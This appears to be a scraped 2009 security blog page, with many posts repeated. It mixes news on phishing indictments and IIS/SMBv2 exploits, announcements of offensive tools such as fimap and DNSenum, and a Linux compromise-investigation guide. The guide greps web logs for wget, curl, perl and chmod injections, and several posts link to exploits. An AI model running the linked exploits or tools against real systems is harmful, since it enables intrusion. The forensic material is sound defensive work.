Computerworld - More than 50 people in Southern California, Las Vegas and Charlotte, N.C., were indicted by a grand jury in Los Angeles for scheming to steal bank account information from thousands of people in the U.S. using phishing techniques.
U.S. authorities today arrested 33 of those named in the indictments and are on the lookout for the other 20.
In addition, authorities in Egypt charged another 47 co-conspirators in connection with the same scheme, bringing the total number of people charged to 100 -- the largest number of defendants ever charged for the same cybercrime, according to the FBI.
The indictments stem from a two-year operation dubbed "Phish Phry," which involved the FBI, the U.S. Attorney's Office, the Electronic Crimes Task Force in Los Angeles and Egyptian law enforcement authorities.
The arrests were announced in Los Angeles by Keith Bolcar, acting assistant director in charge of the FBI in Los Angeles, George Cardona, acting U.S. Attorney in Los Angeles, and Egyptian law enforcement authorities.
The 51-count indictment, which was unsealed today, accused all of the defendants with conspiracy to commit wire fraud and bank fraud. Some of those named were also charged with aggravated identity theft, unauthorized access to protected computers and money laundering.
Phishing is a form of social engineering in which attackers send e-mails made to look like legitimate correspondence from reputable institutions such as banks. Victims are directed to Web sites that look authentic but are actually fakes. Once there, they are asked to enter information that can later be used to break into accounts or to commit identity theft.
According to the indictment, hackers in Egypt used phishing techniques to obtain bank account numbers and related personal data from thousands of bank customers in the U.S. The information was then used to break into customer accounts at two U.S. banks, Bank of America and Wells Fargo.
The Egyptian hackers then recruited individuals in the U.S. to help transfer funds from the compromised accounts to newly created accounts. The U.S. part of the crime ring was allegedly managed by Kenneth Lucas, Nichole Merzi and Jonathan Clark, all of whom are residents of California, the FBI said in statement.
The three individuals are alleged to have directed associates to recruit "runners" to establish bank accounts to which funds stolen from the compromised accounts could be transferred. A portion of the funds was wired to the conspirators in Egypt.
The alleged conspirators typically withdrew amounts ranging from a few hundred dollars to more than $2,000 from compromised bank accounts and then transferred the money into the new accounts.
"The sophistication with which Phish Phry defendants operated represents an evolving and troubling paradigm in the way identity theft is now committed," Bolcar said in a statement. The operations of the group had a significant impact on the operations of two banks and caused "huge headaches" for the victims, the statement added.
All of the individuals charged in the U.S face prison terms of up to 20 years if they are convicted.
John Harrison, a group product manager for security vendor Symantec Corp. said the arrests highlight the truly global nature of phishing operations. Despite heightened awareness of the problem, phishing schemes continue to thrive on the Internet, he said.
Last year, Symantec counted more than 55,000 phishing sites. That figure represented an increase of more than 60% from 2007 levels, Harrison said. The growing availability of sophisticated phishing tool kits is adding to the problem by making it much simpler for would-be phishers to create spoofed Web sites that can be used to trick victims into parting with confidential information, he said.
Thursday, October 08, 2009
Static Binary Analysis of Recent SMBv2 Vulnerability
The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer's Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.
Details:http://www.secureworks.com/research/threats/windows-0day/?threat=windows-0day
Details:http://www.secureworks.com/research/threats/windows-0day/?threat=windows-0day
Sunday, October 04, 2009
File Carving and File Recovery with DiskDigger
DiskDigger is a tool that allows you to recover deleted files off of a FAT or NTFS drive. It has two modes of operation: In the first it merely looks in the FAT/MFT to find files marked as deleted, in much the same way that the tool called Restoration does. In the 2nd mode it does a file carve down the drive looking at the raw bits and finding the know headers and footers of various file types, much like PhotoRec. While PhotoRec seems a little more powerful, DiskDigger is easier to use and its preview functionality is quite nice. This video will cover the basics of recovering deleted files with DiskDigger.
See this video:
http://www.irongeek.com/videos/file-carving-and-file-recovery-with-diskdigger.swf
See this video:
http://www.irongeek.com/videos/file-carving-and-file-recovery-with-diskdigger.swf
Saturday, October 03, 2009
FOSS.my 2009 (24-25 October 2009)
FOSS.my 2009 is Malaysia’s premier Free and Open Source Software (FOSS) event. FOSS.my 2009 is our second such conference, we aim for this to be an annual event bringing together professionals and enthusiasts from Malaysia, Singapore, Asia and the rest of the world for a two day grassroots driven FOSS conference.
http://foss.my/2009/schedule/
http://foss.my/2009/schedule/
Monday, September 14, 2009
NSMnow – 1.5.0
NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use, test an NSM configuration for themselves but were daunted by the process of doing from scratch.
With this being initial release for support to Fedora, RHEL, and CentOS systems there is bound to be some teething problems. So as long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that’s possible.
Download:http://www.securixlive.com/nsmnow/download.php
With this being initial release for support to Fedora, RHEL, and CentOS systems there is bound to be some teething problems. So as long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that’s possible.
Download:http://www.securixlive.com/nsmnow/download.php
iPhone anti-phishing sigs only slightly delayed
A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.
On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly been fixed.
It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.
"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."
On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.
"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."
Sutton commended Apple for its attention to security on the iPhone.
"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."
From:SecurityFocus
On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly been fixed.
It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.
"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."
On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.
"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."
Sutton commended Apple for its attention to security on the iPhone.
"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."
From:SecurityFocus
Sunday, September 13, 2009
Hack In The Box Security Conference 2009 - Malaysia
Date: 5-8 October 2009
Venue:Crowne Plaza Mutiara Kuala Lumpur,Jalan Sultan Ismail,50250 Kuala Lumpur
HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information.
You can see details here:
http://conference.hitb.org/hitbsecconf2009kl/
Venue:Crowne Plaza Mutiara Kuala Lumpur,Jalan Sultan Ismail,50250 Kuala Lumpur
HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information.
You can see details here:
http://conference.hitb.org/hitbsecconf2009kl/
Thursday, September 10, 2009
Hackers already exploiting IIS flaws
Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.
Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.
The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".
"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.
Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.
Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.
"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.
"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."
Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.
The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".
"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.
Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.
Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.
"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.
"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."
How to Investigate a compromised Linux Server
This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an un-privileged account. You must identify how the server was compromised, so you can patch those areas.
Note: Don't get distracted with what you find, focus on gathering as much information as possible before disturbing the environment
Identify Who is on the Server
Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.
#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept
Identify current network activity:
#netstat -nalp
View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80.
Replacing :80 , with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
#cut -f1 -d: | \
#sort | uniq -c | sort -n
1 0.0.0.0
1 127.0.0.1
1 149.254.192.205
1 151.65.171.19
1 165.155.200.87
1 173.66.139.70
1 195.93.21.97
1 60.48.171.251
1 60.53.227.174
1 72.30.142.83
1 75.101.147.30
1 79.7.248.51
1 82.206.136.38
1 83.229.112.20
1 96.231.93.237
2 202.133.102.242
2 41.210.38.158
2 86.16.94.89
3 208.54.94.9
5 41.210.17.188
5 41.210.35.165
5 66.150.96.121
5 83.87.69.25
9 68.191.207.0
11 65.49.2.92
What is the state of the current connections?
#netstat -plant | \
#awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
13 FIN_WAIT2
53 LISTEN
129 TIME_WAIT
316 ESTABLISHED
754 CLOSE_WAIT
Type, and process name:
#netstat -plant | \
#awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
#sort | uniq -c | sort -n| tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
2 TIME_WAIT
3 LISTEN httpd
3 SYN_SENT firefox
9 ESTABLISHED httpd
11 ESTABLISHED firefox
46 ESTABLISHED slapd
List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n
To view the numeral port number, as opposed to the service name
#lsof -nPi
What Processes are Running?
#ps -elf
#ls /proc/*/exe -la
Unhide
Sometimes process will hide them selves well enough that our shell scripts aren't gonna pick up the process. In these instances I use unhide:
http://www.security-projects.com/?Unhide
Compile Unhide:
$ wget http://www.security-projects.com/unhide20080519.tgz
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin
Using Unhide:
$ unhide-tcp
Unhide 20080519
yjesus@security-projects.com
Starting TCP checking
Starting UDP checking
$ unhide proc
Unhide 20080519
yjesus@security-projects.com
[*]Searching for Hidden processes through /proc scanning
Found HIDDEN PID: 740
Command:
Found HIDDEN PID: 775
Command:
Found HIDDEN PID: 1004
Command:
Found HIDDEN PID: 2996
Command:
Found HIDDEN PID: 26921
Command: ./123qwelb
Found HIDDEN PID: 27109
Command: ./123qwelb
Found HIDDEN PID: 27213
Command: ./123qwelb
Found HIDDEN PID: 27216
Command: ./123qwelb
Found HIDDEN PID: 27284
Command: top
Check Binary Files
Often times malicious users will replace system binaries with modified copies which will leave back-doors for the attacker to use in the event that the original vector of attack is corrected.
You can use the command strings to view the text data in a binary file. As such you can use this as a way to determine if a binary has been modified in any way.
Compare the output of the following command with that of a known good server:
#strings /usr/bin/top
Investigate Process Activity
Wanna see what a process is doing? Run the following command replacing $PID with the actual process id:
#strace -p $PID
DESCRIPTION
In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.
The -p flag allows you to attach strace to an already running process.
Suspicious Files
Are suspicious files located in the world writeable directories?
The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.
#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab
Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...
Point(s) of Entry
Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.
Many times vulnerable web scripts (php, perl, etc) are exploited and commands are then executed on the server as the web user. We are going to want to use grep to search the apache logs for some common commands that are often used by intruders.
You will want to use different commands depending on what control panel software the server is running
No control panel
for i in `locate access_log` ;
do
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;
done
You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.
cPanel
The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'
Ensim
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20'/home/virtual/site*/fst/var/log/httpd/*
Plesk
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*
On servers with a large number of sites, running the previous command will give you an argument list too long error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2/dev/null;
done;
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*
To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'
This command searches the URI string for the text http. URIs with a protocol identifier in them often times indicate a XSS attack. However some applications such as WordPress, among others, can result in false positives. Additionally this command will only return results for requests with a positive reply code, indicating a successful request to the web server.
Reminders
Keep in mind that not all results mean the server has been compromised, it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives so using grep to cut 404's and 400's out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.
Document all of your findings!
Wrap Up
Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.
Ideally you should upload your sites to the new server from a local backup, however we can attempt to clean up the sites as best you can if local backups are not available.
User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.
From: http://neranjara.org/article/title/How_to_Investigate_a_compromised_Linux_Server
Note: Don't get distracted with what you find, focus on gathering as much information as possible before disturbing the environment
Identify Who is on the Server
Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.
#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept
Identify current network activity:
#netstat -nalp
View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80.
Replacing :80 , with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
#cut -f1 -d: | \
#sort | uniq -c | sort -n
1 0.0.0.0
1 127.0.0.1
1 149.254.192.205
1 151.65.171.19
1 165.155.200.87
1 173.66.139.70
1 195.93.21.97
1 60.48.171.251
1 60.53.227.174
1 72.30.142.83
1 75.101.147.30
1 79.7.248.51
1 82.206.136.38
1 83.229.112.20
1 96.231.93.237
2 202.133.102.242
2 41.210.38.158
2 86.16.94.89
3 208.54.94.9
5 41.210.17.188
5 41.210.35.165
5 66.150.96.121
5 83.87.69.25
9 68.191.207.0
11 65.49.2.92
What is the state of the current connections?
#netstat -plant | \
#awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
13 FIN_WAIT2
53 LISTEN
129 TIME_WAIT
316 ESTABLISHED
754 CLOSE_WAIT
Type, and process name:
#netstat -plant | \
#awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
#sort | uniq -c | sort -n| tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
2 TIME_WAIT
3 LISTEN httpd
3 SYN_SENT firefox
9 ESTABLISHED httpd
11 ESTABLISHED firefox
46 ESTABLISHED slapd
List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n
To view the numeral port number, as opposed to the service name
#lsof -nPi
What Processes are Running?
#ps -elf
#ls /proc/*/exe -la
Unhide
Sometimes process will hide them selves well enough that our shell scripts aren't gonna pick up the process. In these instances I use unhide:
http://www.security-projects.com/?Unhide
Compile Unhide:
$ wget http://www.security-projects.com/unhide20080519.tgz
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin
Using Unhide:
$ unhide-tcp
Unhide 20080519
yjesus@security-projects.com
Starting TCP checking
Starting UDP checking
$ unhide proc
Unhide 20080519
yjesus@security-projects.com
[*]Searching for Hidden processes through /proc scanning
Found HIDDEN PID: 740
Command:
Found HIDDEN PID: 775
Command:
Found HIDDEN PID: 1004
Command:
Found HIDDEN PID: 2996
Command:
Found HIDDEN PID: 26921
Command: ./123qwelb
Found HIDDEN PID: 27109
Command: ./123qwelb
Found HIDDEN PID: 27213
Command: ./123qwelb
Found HIDDEN PID: 27216
Command: ./123qwelb
Found HIDDEN PID: 27284
Command: top
Check Binary Files
Often times malicious users will replace system binaries with modified copies which will leave back-doors for the attacker to use in the event that the original vector of attack is corrected.
You can use the command strings to view the text data in a binary file. As such you can use this as a way to determine if a binary has been modified in any way.
Compare the output of the following command with that of a known good server:
#strings /usr/bin/top
Investigate Process Activity
Wanna see what a process is doing? Run the following command replacing $PID with the actual process id:
#strace -p $PID
DESCRIPTION
In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.
The -p flag allows you to attach strace to an already running process.
Suspicious Files
Are suspicious files located in the world writeable directories?
The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.
#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab
Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...
Point(s) of Entry
Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.
Many times vulnerable web scripts (php, perl, etc) are exploited and commands are then executed on the server as the web user. We are going to want to use grep to search the apache logs for some common commands that are often used by intruders.
You will want to use different commands depending on what control panel software the server is running
No control panel
for i in `locate access_log` ;
do
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;
done
You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.
cPanel
The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'
Ensim
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20'/home/virtual/site*/fst/var/log/httpd/*
Plesk
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*
On servers with a large number of sites, running the previous command will give you an argument list too long error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2/dev/null;
done;
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*
To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'
This command searches the URI string for the text http. URIs with a protocol identifier in them often times indicate a XSS attack. However some applications such as WordPress, among others, can result in false positives. Additionally this command will only return results for requests with a positive reply code, indicating a successful request to the web server.
Reminders
Keep in mind that not all results mean the server has been compromised, it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives so using grep to cut 404's and 400's out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.
Document all of your findings!
Wrap Up
Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.
Ideally you should upload your sites to the new server from a local backup, however we can attempt to clean up the sites as best you can if local backups are not available.
User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.
From: http://neranjara.org/article/title/How_to_Investigate_a_compromised_Linux_Server
Wednesday, September 09, 2009
Vista/2008/Windows 7 SMB2 BSOD 0Day
This vulnerability affecting Microsoft SMB2 can be remotely crashed with proof-of-concept code that has been published.This vulnerability affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled with one 1 packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall.
More details, http://milw0rm.com/exploits/9594
More details, http://milw0rm.com/exploits/9594
Friday, September 04, 2009
Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
This is the steps how to exploit it:
http://www.milw0rm.com/exploits/9587
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
This is the steps how to exploit it:
http://www.milw0rm.com/exploits/9587
fimap-A little tool for local and remote file inclusion auditing and exploitation
fimap is a little python tool which can find, prepare, scan, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's is currently under heavy development but it's usable.
fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.
You can download it here:
http://code.google.com/p/fimap/downloads/list
fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.
You can download it here:
http://code.google.com/p/fimap/downloads/list
Monday, August 31, 2009
Indonesian Hackers Launch Independence Day Attack on Malaysian Web Sites
A ring of Indonesian hackers on Monday claimed to have attacked a list of more than 120 Web sites as retribution for Malaysia’s alleged theft of Indonesian cultural items and abuse of migrant workers.
A statement was posted on a Blogspot blog titled "Terselubung" saying that a number of Malaysian Web sites had been hacked and defaced to “celebrate” Malaysia’s Independence Day, which fell on Monday August 31.
“Today, August 31, 2009, an uncreative country, a country who likes to steal Indonesian culture, a country whose citizen is the mastermind of bombings in Indonesia, a country who has tortured many of our sisters — the migrant workers who worked there, a country who abused our national anthem, a country who harassed Indonesia on the Internet, a country that has stolen Sipadan and Ligitan islands, a country which has trespassed our water illegally, a country which received their independence from Britain, is celebrating its anniversary,” the Web site stated.
From HITB website
If you want to see original article from Terselubung blog is here:
http://terselubung.blogspot.com/2009/08/perang-online-dengan-malaysia-di-mulai.html
A statement was posted on a Blogspot blog titled "Terselubung" saying that a number of Malaysian Web sites had been hacked and defaced to “celebrate” Malaysia’s Independence Day, which fell on Monday August 31.
“Today, August 31, 2009, an uncreative country, a country who likes to steal Indonesian culture, a country whose citizen is the mastermind of bombings in Indonesia, a country who has tortured many of our sisters — the migrant workers who worked there, a country who abused our national anthem, a country who harassed Indonesia on the Internet, a country that has stolen Sipadan and Ligitan islands, a country which has trespassed our water illegally, a country which received their independence from Britain, is celebrating its anniversary,” the Web site stated.
From HITB website
If you want to see original article from Terselubung blog is here:
http://terselubung.blogspot.com/2009/08/perang-online-dengan-malaysia-di-mulai.html
Friday, August 28, 2009
DNSenum
DNSenum is a pentesting cool created to enumerate DNS info about domains.
The purpose of Dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:
1) Get the host's addresse (A record).
2) Get the namservers (threaded).
3) Get the MX record (threaded).
4) Perform axfr queries on nameservers (threaded).
5) Get extra names and subdomains via google scraping (google query = "allinurl: -www site:domain").
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7) Calculate C class domain network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9) Write to domain_ips.txt file ip-blocks.
The purpose of Dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:
1) Get the host's addresse (A record).
2) Get the namservers (threaded).
3) Get the MX record (threaded).
4) Perform axfr queries on nameservers (threaded).
5) Get extra names and subdomains via google scraping (google query = "allinurl: -www site:domain").
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7) Calculate C class domain network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9) Write to domain_ips.txt file ip-blocks.
Thursday, August 27, 2009
Hacking Exposed:Network Security Secrets and Solutions
I'm still reading this Hacking Exposed 6th Edition book. I hope i will finish this week.
Hacking Exposed established this entire genre of books. Now in its 6th (and 10th anniversary) edition, and having sold millions of copies throughout the world, the book remains the #1 best-selling computer security book in the world and it is still just as useful and valuable as it ever was. Kurtz, McClure, and Scambray have once again update this highly resected title to include the latest and greatest in attacks and exploits, as well as the cutting edge countermeasures and security controls you can implement to protect your PC or your network.
New and updated material:
-New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
-Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
-The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
-New wireless and RFID security tools, including multilayered encryption and gateways
-All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
-Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
-VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
-Fully updated chapters on hacking the Internet user, web hacking, and securing code
Table of contents
Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivityand VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index
Hacking Exposed established this entire genre of books. Now in its 6th (and 10th anniversary) edition, and having sold millions of copies throughout the world, the book remains the #1 best-selling computer security book in the world and it is still just as useful and valuable as it ever was. Kurtz, McClure, and Scambray have once again update this highly resected title to include the latest and greatest in attacks and exploits, as well as the cutting edge countermeasures and security controls you can implement to protect your PC or your network.
New and updated material:
-New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
